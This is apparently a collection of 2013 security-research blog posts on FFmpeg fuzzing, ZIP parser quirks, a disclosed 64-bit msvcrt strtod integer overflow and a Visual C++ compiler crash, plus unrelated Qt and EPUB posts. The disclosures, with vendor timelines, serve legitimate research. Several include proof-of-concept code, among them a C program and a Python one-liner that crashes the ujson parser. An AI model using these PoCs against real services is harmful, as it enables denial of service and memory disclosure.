  • Roughly at the same time the Google-developed AddressSanitizer run-time memory error detector was gaining recognition. The utility offered instant and accurate detection of common classes of memory-related problems such as out-of-bounds read and write access to {stack, heap, static} arrays, use-after-free, invalid free, double free and more, at the cost of a 2-3x average slow down and some insignificant memory overhead. The utility seemed to be a perfect candidate for improving the detection rate of fuzzing-incurred errors which would otherwise not be detected at all or would manifest themselves in areas of code completely unrelated to the root cause location.
  • As a bonus, the ASan team decided to make it compatible with FFmpeg at early stages of the development and later ran the ASan-instrumented FFmpeg over a set of valid input files (not malformed or mutated in any way). Only by doing this, they were able to identify four bugs (see "Found Bugs"), providing us with more evidence that the codebase might require further investigation in search of programming errors in dealing with incorrectly formatted input bitstreams.
All of the above arguments discuss how the nature of FFmpeg made it suitable for automated testing, but there is also the matter of whether finding and having bugs fixed in the product is worthwhile, or more precisely, who would benefit from the improved security posture of the project. FFmpeg and its derivatives (such as the spin-off Libav project) are the foundation of many other media-processing programs used by desktop PC users and companies alike. Notable examples of products built upon, relying on or using parts of FFmpeg include Google Chrome, MPlayer, VLC and xine. As a result, it was expected that any discovered and fixed bug would make millions of users directly or indirectly more secure, being enough of a justification to proceed and take the effort from idea to realization.

Before any fuzzing actually takes place, it is usually crucial for the success of the operation to gather a set of files with extensive code coverage, so that more (potentially unexpected) program states can be triggered during the fuzzing itself, spun off the original coverage. We approached the problem by collecting around 7,000 sample media files from the aforementioned website and the FFmpeg FATE regression test suite, later adding more exotic files from the public web in order to further improve the subset of formats and codecs covered by the corpus. Once we were finally happy with the total number of basic blocks touched while processing the test cases (being a good measure of the total code coverage achieved), we made use of some 2,000 cores and relatively simple algorithms (such as bitflipping, swapping bytes, truncating the files and so forth) to mutate the input data, feed it to FFmpeg and save information about any resulting crashes.
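
The simple mutation algorithms named above can be sketched in a few lines of Python. This is only an illustration of the three mutation types, not the fuzzer that was actually used; the function names, the 1% flip ratio and the seeding scheme are assumptions made for this example. Feeding the result to the ffmpeg executable and recording crashes is left out.

```python
import random

def bitflip(data: bytes, rng: random.Random, ratio: float = 0.01) -> bytes:
    """Flip single bits in roughly `ratio` of the bytes (at least one flip)."""
    out = bytearray(data)
    for _ in range(max(1, int(len(out) * ratio))):
        i = rng.randrange(len(out))
        out[i] ^= 1 << rng.randrange(8)
    return bytes(out)

def swap_bytes(data: bytes, rng: random.Random) -> bytes:
    """Swap the bytes at two randomly chosen offsets."""
    out = bytearray(data)
    i, j = rng.randrange(len(out)), rng.randrange(len(out))
    out[i], out[j] = out[j], out[i]
    return bytes(out)

def truncate(data: bytes, rng: random.Random) -> bytes:
    """Cut the file at a random offset (input must be at least 2 bytes long)."""
    return data[: rng.randrange(1, len(data))]

def mutate(data: bytes, seed: int) -> bytes:
    """Apply one randomly chosen mutation; the seed makes a test case reproducible."""
    rng = random.Random(seed)
    return rng.choice([bitflip, swap_bytes, truncate])(data, rng)

sample = bytes(range(256))
mutated = mutate(sample, seed=1)
print(len(mutated) <= len(sample))  # True
```

Keeping the seed next to each mutated file is one simple way to regenerate a crashing input later without storing every test case.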

The first fuzzing iteration ran for approximately one week and was able to uncover around 130 unique problems in the code, ranging from simple assertion failures to stack-based buffer overflows and other severe conditions:
  • NULL pointer dereferences,
  • Invalid pointer arithmetic leading to SIGSEGV due to unmapped memory access,
  • Out-of-bounds reads and writes to stack, heap and static-based arrays,
  • Invalid free() calls,
  • Double free() calls over the same pointer,
  • Division errors,
  • Assertion failures,
  • Use of uninitialized memory.
Our personal feeling is that between 10% and 20% of the problems could be considered easily exploitable security issues; however, the estimation has not been formally confirmed in any way.

We subsequently contacted the project maintainer - Michael Niedermayer - who submitted the first fix on the 24th of January, 2012 (see commit c77be3a35a0160d6af88056b0899f120f2eef38e). Since then, we have carried out several dozen fuzzing iterations (each typically resulting in fewer crashes than the previous ones) over the last two years using similar resources, occasionally improving our original corpus and tweaking the mutation configuration (e.g. fiddling with mutation ratios or getting them to match the internal structure of the tested files). Ever since we started the effort, we have been working closely with Michael, who has been extremely keen to work with us and fix all issues we would send his way. The numbers speak for themselves - out of over a thousand commits submitted to FFmpeg as fixes to our findings, at least 750 were authored by Michael, which gives an outstanding average of one commit every single day for the last 23 months! We would like to thank him for all the work he has done and continues to do to improve the stability and security of the product; finding the bugs is just the start of a success.

The other ~350 commits in FFmpeg were mostly submitted by Libav project developers: Ronald S. Bultje, Luca Barbato, Alex Converse, Martin Storsjö and Anton Khirnov. We have been concurrently reporting issues in Libav during the last several months and, similarly to FFmpeg, the maintainers are doing a great job writing and submitting patches, which FFmpeg is also cherry-picking to their own git repository (large chunks of the two projects are shared, as Libav started as a fork of FFmpeg). While the former project is doing their best to catch up with the latter, the figures speak for themselves again: there are "only" 413 commits tagged "Jurczyk" or "Coldwind" in Libav, so even though some of the FFmpeg bugs might not apply to Libav, there are still many unresolved issues there which are already fixed in FFmpeg. Consequently, we advise users to use the FFmpeg upstream code where possible, or the latest stable version (currently 2.1.1) otherwise. It is also a good idea to carefully consider which formats and codecs are necessary for your use case and disable all other parsers at compile time, in order to reduce the attack surface to a minimum.

We are presently still improving our corpus and fuzzing methods and will continue to work with both FFmpeg and Libav to ensure the highest quality of the software as used by millions of users behind multiple media players. If you are interested in the effort, please keep an eye on the master branches for commits marked as "Found by Mateusz "j00ru" Jurczyk and Gynvael Coldwind" and watch out for new stable versions of the software packages. Hopefully, one day we will be able to declare both projects "fuzz clean" against most publicly available samples and simple mutation algorithms. Until then, we recommend refraining from using either of the two projects to process untrusted media files or, where processing them is absolutely required, using privilege separation on your PC or production environment.

Complete lists of developers who have ever submitted patches for bugs we identified in FFmpeg and Libav are shown below (sorted by the number of commits). They clearly illustrate that as of today, FFmpeg includes virtually all fixes developed for Libav, while Libav only has 50 of Michael's 750 commits (as previously mentioned, not all FFmpeg bugs affect Libav in the first place, though).

FFmpeg:

750 Michael Niedermayer
108 Ronald S. Bultje
91 Luca Barbato
77 Martin Storsjö
48 Anton Khirnov
29 Alex Converse
5 Kostya Shishkov
4 Thilo Borgmann
1 Vitor Sessak
1 Reinhard Tartler
1 Paul B Mahol
1 Mashiat Sarker Shakkhar
1 Mans Rullgard
1 Justin Ruggles
1 Janne Grunau
1 Aurelien Jacobs

Libav:

107 Ronald S. Bultje
89 Luca Barbato
77 Martin Storsjö
50 Michael Niedermayer
48 Anton Khirnov
27 Alex Converse
5 Kostya Shishkov
2 Thilo Borgmann
1 Vitor Sessak
1 Reinhard Tartler
1 Paul B Mahol
1 Mashiat Sarker Shakkhar
1 Mans Rullgard
1 Justin Ruggles
1 Janne Grunau
1 Aurelien Jacobs

We would like to thank all of the above developers for their hard work on making both media libraries better with every single day.

English version of my ZIP-format slides

By Gynvael Coldwind | Wed, 04 Dec 2013 00:08:43 +0100 | @domain:
Ange reminded me that I never published the English version of the slides from my "Ten Thousand Traps: ZIP, RAR, etc" talk. I gave the talk in May this year, in Krakow, at a small Polish conference called SEConference. Apart from the slides there are also several "weird" ZIP examples, including a "schizophrenic" one (as Ange calls them - and it's an accurate and easy to remember name), which seems to contain different files when viewed with various ZIP parsers/libraries/unpackers (see slides 24 to 27 for results).

Download links:

the slides (2.8 Mb)
the weird zips (14 Kb)

I don't have this talk recorded in English, but you can see the demos in the recording of my Polish talk (in Polish) - see below.

• DEMO 1 at 2:00 - Unreal Commander exploit (ZIP unpack path traversal into DLL spoofing due to wrong directory privileges).
• DEMO 2 at 12:23 - viewed from Python, PHP and Java.
• DEMO 3 at 18:18 - File names in ZIP, exploit from DEMO 1 explained.
• DEMO 4 at 21:15 - Files with same name in ZIP.
• DEMO 5 at 26:10 - Memory content disclosure in Unreal Commander.
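The "files with same name" case from DEMO 4 is easy to reproduce. The sketch below is not one of the files from the talk; it builds a throwaway archive in memory with Python's zipfile module, and the entry name readme.txt is made up for the example. It shows that the listing reports two entries while a lookup by name can only return one of them, and which one a given unpacker picks is exactly the kind of ambiguity the talk is about.

```python
import io
import warnings
import zipfile

buf = io.BytesIO()
with warnings.catch_warnings():
    warnings.simplefilter("ignore")  # zipfile warns about the duplicate name
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "first")
        zf.writestr("readme.txt", "second")

with zipfile.ZipFile(buf) as zf:
    names = zf.namelist()            # every central directory entry is listed
    content = zf.read("readme.txt")  # lookup by name resolves to a single entry

print(names)
print(content)
```

Other libraries and unpackers may resolve the name differently, overwrite one file with the other on extraction, or refuse the archive.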

And that's it.

P.S. If you're into ZIP files, you might want to check out the Android "Master Key" bug (and other) - just google for it.

Windows msvcr*.dll 64-bit strtod endptr integer overflow

By Gynvael Coldwind | Sat, 23 Nov 2013 00:08:41 +0100 | @domain:
Some time ago I was reading a random Python JSON parsing library which was partly implemented in C. At one point I thought I spotted a bug in custom float number parsing - I've written a short PoC to trigger it and it worked (i.e. crashed Python), but behaved differently than I expected it to and seemed to work only on Windows. So I got back to looking at the code and in the end decided it was only my imagination - there was no bug. So… why did that PoC actually work? It turned out that in some cases the library fell back to using the good-old strtod for float parsing instead and yes, there was a bug - in the underlying msvcrt.dll strtod implementation.


  • The strtod/et al. (string-to-double) has a char **endptr output parameter, in which it stores the address of the next character after the parsed/converted-to-double number in the input buffer. This parameter is used by parsers to determine where to continue parsing after a number has been read.
  • Since internally strtod (or actually _fltin2 and _wfltin2 which are used deep inside) uses a 32-bit int type to store the number-of-parsed-characters, the final calculation of endptr (startptr + number-of-parsed-characters) may result in an address that is outside (in front) of the input text buffer on 64-bit systems.
  • This results in introducing DoS class, information leak class, or other types of bugs in parsers that rely on strtod and the endptr parameter.

Note: Both the glibc and MinGW (statically linked) strtod implementations don't have this bug - it's msvcr*.dll specific.
Note 2: PoCs are at the bottom.

Root cause

The direct problem is in the _flt structure used by the _fltin2 and _wfltin2 functions, which are used to do the actual string-to-double conversion in strtod/etc (see Affected versions and functions below). This structure looks as follows (Visual C++ CRT source code, file \crt\src\fltintrn.h):

typedef struct _flt
{
    int flags;
    int nbytes; /* number of characters read */
    long lval;
    double dval; /* the returned floating point number */
} *FLT;

This causes problems with overly long numbers on 64-bit platforms, since the nbytes might overflow (for numbers of length >= 2GB and < 4GB, etc), which leads to it having a negative or zero value.
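A quick way to see which lengths end up negative or zero is to model the 32-bit signed store in Python. This is only an arithmetic illustration; as_int32 is a helper made up for this sketch, not a CRT function.

```python
def as_int32(n: int) -> int:
    """Value of n after being stored in a 32-bit signed int (wraps modulo 2**32)."""
    return (n + 2**31) % 2**32 - 2**31


# Character counts around the 2 GB and 4 GB boundaries.
for length in (2**31 - 1, 2**31, 2**31 + 0x16, 2**32, 2**32 + 5):
    print(f"{length:#x} chars -> nbytes = {as_int32(length)}")
```

Anything from 2 GB up to just below 4 GB comes out negative, exactly 4 GB comes out as zero, and the pattern repeats above that.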

This is problematic for strtod/et al., since they calculate the *endptr value in the following way (\crt\src\strtod.c):

    struct _flt answerstruct;
    FLT answer;
    answer = _fltin2( &answerstruct, ptr, _loc_update.GetLocaleT());

    if ( endptr != NULL )
        *endptr = (char *) ptr + answer->nbytes;

A reasonably common way to use strtod in parsers (think: a JSON/XML/CSV/etc parser) is to do something like this:

if (looks_like_a_double(p)) {
    char *ep;
    val = strtod(p, &ep);
    // errno checking / usage of val here
    p = ep;
}

This in fact leads to p pointing outside of the buffer (up to 2GB in front of the buffer) and the parsing continues there.
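The pointer arithmetic can be replayed with plain integers. The sketch below models `ptr + answer->nbytes` on a 64-bit target, using the buffer address and length from the example PoC output at the bottom of this post; as_int32 and crt_endptr are names invented for the illustration.

```python
MASK64 = 2**64 - 1


def as_int32(n: int) -> int:
    """Value of n after being stored in a 32-bit signed int."""
    return (n + 2**31) % 2**32 - 2**31


def crt_endptr(start: int, parsed_chars: int) -> int:
    """Model of `ptr + answer->nbytes` with a 32-bit nbytes and 64-bit pointers."""
    return (start + as_int32(parsed_chars)) & MASK64


start = 0x7FFF0040   # buffer address taken from the example PoC output
parsed = 0x80000015  # SZ - 1 characters precede the terminating 'm'

print(f"end_good   = {start + parsed:016X}")
print(f"end_strtod = {crt_endptr(start, parsed):016X}")
```

With a 4 GB long number the same model returns the start address unchanged, which is the infinite loop case.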


Since this is a low-level library function, the impact depends on what it is used for. Here are a couple of examples (assuming that strtod is part of a parser that is passed untrusted input, e.g. a JSON or CSV file):
  • Infinite loop DoS - if the input string is 4 GB long, the resulting end pointer will be identical to the start pointer, so the parser will enter an infinite loop (strtod doesn't report any errors of course, since the number is correctly parsed)
  • Crash DoS - setting the end pointer so that it points to unallocated memory (e.g. for a number of length 2GB the end pointer will be the start pointer minus 2GB, which probably points to some unallocated memory or isn't even a canonical pointer)
  • Information disclosure - since you could redirect the "read pointer" of the parser to any buffer in memory that is at a lower address than the start pointer, you could make it read arbitrary data from memory; if the data read were later reflected back, you could retrieve it.
  • Other - there might be other, less probable (but still possible) examples; one would be a more complicated scenario where the parsed text (code) is verified beforehand, and then parsed and executed. In such a case this bug could be used to redirect the parser to jump into e.g. the middle of a string/comment containing unsafe code (similar to jumping into the middle of an instruction in ROP, but on the scripting language level). This would make an awesome CTF challenge, but I don't expect it to be found in real products.
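The first two scenarios share one symptom: the returned end pointer is not strictly ahead of the read position, or it lies outside the buffer. A parser that only calls strtod after deciding the input looks like a number can check for that before continuing. The sketch below models the check with integer addresses; checked_advance is a made-up name and this is an assumption about how a caller could defend itself, not a fix for the CRT.

```python
def checked_advance(p: int, ep: int, buf_end: int) -> int:
    """Return ep if it is a sane place to continue parsing, else raise ValueError.

    p       - current read position (where the number starts)
    ep      - end pointer reported by the number parser
    buf_end - address one past the last byte of the input buffer
    """
    if not (p < ep <= buf_end):
        raise ValueError(f"suspicious end pointer {ep:#x} for read position {p:#x}")
    return ep


buf_start = 0x7FFF0040
buf_end = buf_start + 0x80000016

# Normal case: eight characters were consumed.
print(hex(checked_advance(buf_start, buf_start + 8, buf_end)))

# The 4 GB case (ep == p) and the 2 GB case (ep far below p) are both rejected.
for bad_ep in (buf_start, 0xFFFFFFFFFFFF0055 - 2**64):
    try:
        checked_advance(buf_start, bad_ep, buf_end)
    except ValueError as exc:
        print("rejected:", exc)
```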

Affected versions and functions

64-bit Windows only.

This has been confirmed on:
  • default, fully patched Windows 7 msvcrt.dll
  • msvcr90.dll, msvcr110.dll
  • newest Visual Studio 2013 redistributables msvcr120.dll
  • Windows 8.1 (preview) default msvcrt.dll
I guess we can extrapolate this to "all 64-bit versions".

Affected functions (generally: everything that directly or indirectly uses _flt.nbytes for anything meaningful):
  • _fltin2/_wfltin2 - these incorrectly calculate the _flt.nbytes
  • _strtod_l/_wcstod_l - these directly use _flt.nbytes
  • strtod/wcstod - these are just wrappers for the above functions
  • _Stodx/_Stod/_Stofx/_Stof - these use strtod
Worth looking for variants (e.g. __strgtold12_l/__strgtold12?).

Proof of concept

This proof of concept prints both the correct end pointer and the one returned by strtod.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {

  // SZ == INT_MAX + some more bytes
  #define SZ 0x80000016

  char *number = (char*)malloc(SZ);
  if (number == NULL) {
    return 1; // Allocating over 2GB can fail.
  }
  memset(number, '1', SZ);
  number[SZ-1] = 'm'; // Break syntax.
  number[1] = '.'; // This is probably not needed.

  char *end_good = number + SZ - 1;
  char *end_strtod;

  // strtod(number, &end_strtod); is OK too
  // ... unless you use MinGW which uses its own strtod,
  // then it's better to just use _strtod_l for PoC.
  _strtod_l(number, &end_strtod, NULL);

  printf("number = %p\n", number);
  printf("end_good = %p\n", end_good);
  printf("end_strtod = %p\n", end_strtod);

  // Example (faulty) results.
  // number = 000000007FFF0040
  // end_good = 00000000FFFF0055
  // end_strtod = FFFFFFFFFFFF0055

  free(number);
  return 0;
}

Real world example

A random JSON parser for Python with native code - ujson 1.33:

FASTCALL_ATTR JSOBJ FASTCALL_MSVC decodePreciseFloat(struct DecoderState *ds)
{
  char *end;
  double value;
  errno = 0;

  value = strtod(ds->start, &end);

  if (errno == ERANGE)
  {
    return SetError(ds, -1, "Range error when decoding numeric as double");
  }

  ds->start = end;
  return ds->dec->newDouble(ds->prv, value);
}

And a crash DoS PoC in Python (2.7 AMD64):

import ujson

n = "4." + "3"*0x7fffffff
x = ujson.loads(n, precise_float=True)

WinDBG says:

(2088.1fa4): Access violation - code c0000005 (first chance)
00000001`800050dc 8a0a mov cl,byte ptr [rdx] ds:00000001`00010061=??


I've reported the bug to Microsoft and the decision was to fix it in the future releases of Microsoft Visual C++ / Microsoft Windows. I think that's OK, especially taking into account that the possibility of severe vulnerabilities appearing as a result of this Microsoft C runtime library bug is minimal (that said, if you find one, let me know ;>).


Note: A lot of e-mails were flying back and forth, so I'm not going to list all dates.

2013-Aug-21: Sent the report to Microsoft.
2013-Sep-17: Confirmation that the bug works as described and is planned to be fixed.
2013-Oct-26: More information - the bug will be fixed in the next versions of msvcr*.dll.
2013-Nov-13: Microsoft receives the draft of this blog post from me for comments.
2013-Nov-23: Blogpost is public.

And that's it.

Appmenu Qt5: through a bumpy road, but working!

By sil2100 | Tue, 19 Nov 2013 21:19:00 GMT | @domain:
Some time ago I mentioned working on the global application menu for Qt5 - the so-called appmenu-qt5 for Ubuntu and its derivatives. After a longer while, I finally found the time and occasion to resume my work - and, after a really bumpy ride, ended up with a working solution. Some hacks had to be made, some Qt5 design decisions worked around - but the end result is here: a working appmenu-qt5 QPA platformtheme plugin. In this post I would like to give an overview of the implementation of the currently proposed appmenu-qt5. Read on if you're interested in some of the Qt5 internals, the workings of QPlatformTheme plugins and the confusing elements of the Qt Platform Abstraction overall.

Windows System Call and CSR API tables updated

By j00ru | Sat, 16 Nov 2013 17:31:13 +0000 | @domain:
Having the first spare weekend in a really long time, I have decided it was high time to update some (all) of the tables related to Windows system calls and CSR API I once created and now try to maintain. This includes NT API syscalls for the 32-bit and 64-bit Intel platforms, win32k.sys syscalls for […]

ZeroNights 2013 and NTVDM vulnerabilities

By j00ru | Fri, 08 Nov 2013 10:00:53 +0000 | @domain:
Just yesterday I had the pleasure to speak at a highly hacking-oriented Russian conference, ZeroNights, for the second time (see my “ZeroNights slides, Hack In The Box Magazine #9 and other news” post from last year). The conference itself has been great so far – several interesting and inspiring talks, lots of leet Russian hackers […]

Windows win32k.sys menus and some “close, but no cigar” bugs

By j00ru | Thu, 12 Sep 2013 20:04:26 +0000 | @domain:
Welcome after one of the more lengthy breaks in the blog’s activity. Today, I would like to discuss none other than several interesting weaknesses around the implementation of menus (like, window menus) in the core component of the Microsoft Windows kernel – the infamous win32k.sys driver, also known as the “Java of Windows” in terms […]

Black Hat USA 2013, Bochspwn, slides and pointers

By j00ru | Tue, 13 Aug 2013 23:17:27 +0000 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind) Two weeks ago (we’re running late, sorry!) Gynvael and I had the pleasure to attend one of the largest, most technical and renowned conferences in existence – Black Hat 2013 in Las Vegas, USA. The event definitely stood up to our expectations – the city was purely […]

BlackHat USA 2013, Bochspwn, slides and pointers.

By Gynvael Coldwind | Tue, 13 Aug 2013 00:08:38 +0200 | @domain:
[Photo: two gold pwnies with pink and violet hair (photo by Arashi Coldwind btw)]
(Collaborative post by Mateusz "j00ru" Jurczyk and Gynvael Coldwind)
Two weeks ago (we're running late, sorry!) j00ru and I had the pleasure to attend one of the largest, most technical and renowned conferences in existence - Black Hat 2013 in Las Vegas, USA. The event definitely stood up to our expectations - the city was purely awesome, the venue was at least as great, we saw many interesting and truly inspiring talks and a whole bunch of old friends, not to mention meeting a fair number of new folks. In addition to all this, our visit to Vegas turned out quite successful for other reasons too - our "Identifying and Exploiting Windows Kernel Race Conditions via Memory Access Patterns" work was nominated and eventually awarded a Pwnie (in fact, two mascots) in the "Most Innovative Research" category. Woot!

While the subject of memory access pattern analysis or the more general kernel instrumentation was only mentioned briefly when we originally released the first slide deck and whitepaper, as we mostly focused on the exploitation of constrained local kernel race conditions back then, our most recent Black Hat "Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis" talk discussed the specifics of how the control flow of different operating systems' kernels can be logged, examined or changed for the purpose of identifying various types of local vulnerabilities. Demos were presented live and are not available publicly (especially considering that one of them was a 0-day).

Slides: “Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis” (5.26MB, PDF)

During the conference, we also open-sourced our Bochs kernel instrumentation toolkit (including both the CPU instrumentation modules and post-processing tools) under the new name of "kfetch-toolkit". The project is hosted on GitHub and is available for everyone to hack on under the Apache v2 license. Should you have any interesting results, concerns, questions or proposed patches, definitely drop us a line. We are looking forward to some meaningful, external contributions to the project. :-)

Last but not least, we have also explicitly mentioned that we would release all Bochspwn-generated logs that we had looked through and reported to corresponding vendors or deemed to be non-issues or non-exploitable. Below follows a moderately well explained list of reports, including information such as the original Bochspwn output, list of affected functions, our comments based on a (usually brief) investigation and the guest operating system and iteration number. Please note that a large number of Windows reports were assessed to be of a "NO FIX" class by Microsoft, and it might make sense to take another look at these and find out if the vendor didn't miss any obviously exploitable problems (unfortunately, we haven't had the time to perform a thorough analysis of each of the reports). Although a majority of the bugs were found in Windows, the Linux and BSD reports can certainly provide you with some interesting (yet not security-relevant) behavior and a fair dose of amusement. We hope you enjoy looking through the docs. Without further ado, here are the reports:




All comments are more than welcome. Take care!

Approaching BlackHat US 2013 and new Dragon Sector blog

By Gynvael Coldwind | Sat, 27 Jul 2013 00:08:37 +0200 | @domain:
(A shameless copy from j00ru's blog)
This is a quick reminder that Gynvael and I (j00ru) are going to attend BlackHat US 2013 in Las Vegas next week with the “Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis” presentation on the second day of the event. The talk is going to largely extend our previous performance at SyScan this year (see this blog post), detailing the implementation of our “Bochspwn” project, discussing other approaches to system-wide instrumentation and how it can be effectively used to discover different local vulnerability classes (not just double fetches!) in widely used kernels. We will also provide a follow up on using Bochspwn against open-source platforms (Linux, FreeBSD, OpenBSD), including extensive coverage of our findings there, and last but not least, we will release the Bochs instrumentation toolkit as an open-source project for everyone to hack on. If you happen to be in the Sin City at the time, don’t hesitate to come by and say hi! See you there!

If you are not going to make it this time, expect the presentation slide deck shortly after the conference.

In other news, our CTF team called “Dragon Sector” has recently started their own blog. The website is supposed to feature write-ups from the more interesting CTF tasks we manage to solve during the competitions. With merely four posts so far, the blog is surely going to fill up with interesting posts as we play contests in the near future, so be sure to keep an eye on it.


Rile.js - html5 epub reader

By xa | Thu, 25 Jul 2013 20:00:00 GMT | @domain:

What is it?

It's a small HTML5 based EPUB document reader. I’ve created it partially for my fiancée’s writing blog, and partially because I have never done anything with an EPUB format, and I didn’t know anything about it.

Right now the reader is in an early alpha stage and works on Google Chrome and Mozilla Firefox. The next step is to get it working on IE9/10 and other browsers.

For those who don’t know what an EPUB document is - EPUB is a standardised open format for electronic publications. It is based on XML documents compressed together as a single zip file. The most important properties of this format are:

  • An EPUB document is not divided into pages; the reading software decides how to divide the content into pages and how to display it,
  • It supports CSS,
  • It supports SVG and raster images.
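To illustrate the "XML documents in a zip file" part, here is a small Python sketch that builds a minimal EPUB-like container in memory and finds its package document. It is not code from Rile.js (which is written in JavaScript); the META-INF/container.xml entry and the mimetype entry come from the EPUB container format, while the OEBPS/content.opf path and both function names are just values picked for this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

CONTAINER_NS = "urn:oasis:names:tc:opendocument:xmlns:container"

CONTAINER_XML = f"""<?xml version="1.0"?>
<container version="1.0" xmlns="{CONTAINER_NS}">
  <rootfiles>
    <rootfile full-path="OEBPS/content.opf"
              media-type="application/oebps-package+xml"/>
  </rootfiles>
</container>
"""


def make_minimal_epub() -> bytes:
    """Build a tiny EPUB-like zip holding only the two container-level entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/epub+zip")  # first entry, stored uncompressed
        zf.writestr("META-INF/container.xml", CONTAINER_XML)
    return buf.getvalue()


def find_package_document(epub_bytes: bytes) -> str:
    """Return the path of the package (.opf) document named by container.xml."""
    with zipfile.ZipFile(io.BytesIO(epub_bytes)) as zf:
        root = ET.fromstring(zf.read("META-INF/container.xml"))
    rootfile = root.find("c:rootfiles/c:rootfile", {"c": CONTAINER_NS})
    return rootfile.attrib["full-path"]


if __name__ == "__main__":
    print(find_package_document(make_minimal_epub()))
```

A reader would then open the package document to learn which XHTML, CSS and image files make up the book and in what order to show them.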

Right now my goal is to create a simple reader that supports as many simple EPUB documents as possible, so anyone (e.g. a writer) can embed an EPUB document on their blog or page.

Time for some short technical summary.

Approaching BlackHat US 2013 and new Dragon Sector blog

By j00ru | Wed, 24 Jul 2013 15:04:25 +0000 | @domain:
This is a quick reminder that Gynvael and I are going to attend BlackHat US 2013 in Las Vegas next week with the “Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis” presentation on the second day of the event. The talk is going to largely extend our previous performance at SyScan this year (see […]

QMake - forcing no install target AKA target flags

By sil2100 | Wed, 10 Jul 2013 19:13:00 GMT | @domain:
I had an annoying problem today for which I finally found a workaround. Let's assume we're using qmake and the 'testcase' CONFIG for a given target. Strangely, whenever the testcase configuration is used for a given project, all test targets are generated with their 'make install' targets in the Makefile (if the Makefile generator is used, of course), even when we're not adding the target to INSTALLS. But what if we don't want to install the given testcase anywhere? The Qt4 and Qt5 docs say nothing. But the qmake source code says it all.

Changing the cursor shape in Windows proven difficult by NVIDIA (and AMD)

By j00ru | Mon, 01 Jul 2013 12:22:49 +0000 | @domain:
If you work in the software engineering or information security field, you should be familiar with all sorts of software bugs – the functional and logical ones, those found during the development and internal testing along with those found and reported by a number of complaining users, those that manifest themselves in the form of […]

Crashing the Visual C++ compiler

By Gynvael Coldwind | Mon, 24 Jun 2013 00:08:30 +0200 | @domain:
In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the liking of the Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit. After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this).

Heads up!

If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article:

Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the TechNet Article Security Guidance.
In other words (keep in mind I'm not a build service expert, but this is how I understand it):
  • Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server.
  • It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server.
  • You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers' machines, etc.

To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges.

The code that crashes

The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future):

#include <stdio.h>

class A { public: int alot[1024]; };
class B : public A { public: int more[1024]; };
class C : public A { public: int more[1024]; };
class DA : public B,C { public: int much[1024]; };
class DB : public B,C { public: int much[1024]; };

#define X(a) \
class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \
class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; }

#define Y(a) \
X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \
X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA)


// Funny story. Without global it doesn't compile (LNK1248).
// But with global it seems to overflow, and it compiles OK.
int global[0x12348];

int main(void) {

printf("%p\n", &x);
printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing
// DAA...AA_more to different
// amount of 'A'

// Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01):
// test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler.
// (compiler file 'msc1.cpp', line 1420)
// To work around this problem, try simplifying or changing the program near the locations listed above.
// Please choose the Technical Support command on the Visual C++
// Help menu, or open the Technical Support help file for more information
// Internal Compiler Error in cl.exe. You will be prompted to send an error report to Microsoft later.
// (2154.dd4): Access violation - code c0000005 (first chance)
// First chance exceptions are reported before any exception handling.
// This exception may be expected and handled.
// eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0
// eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0 nv up ei pl nz na pe cy
// cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
// MSVCR100!_VEC_memcpy+0x5a:
// 73170bb7 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=????????????????????????????????

return 0;
}

As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason for the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code).

If you manage to prove that the bug is exploitable, let me know!

Vendor communication timeline

2012-09-30: Report sent to Microsoft (DoS only PoC).
2012-10-01: Received ACK + request for further clarification.
2012-10-03: Received information that the crash appears to be exploitable.
2012-10-03: Sent clarification.
2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue.
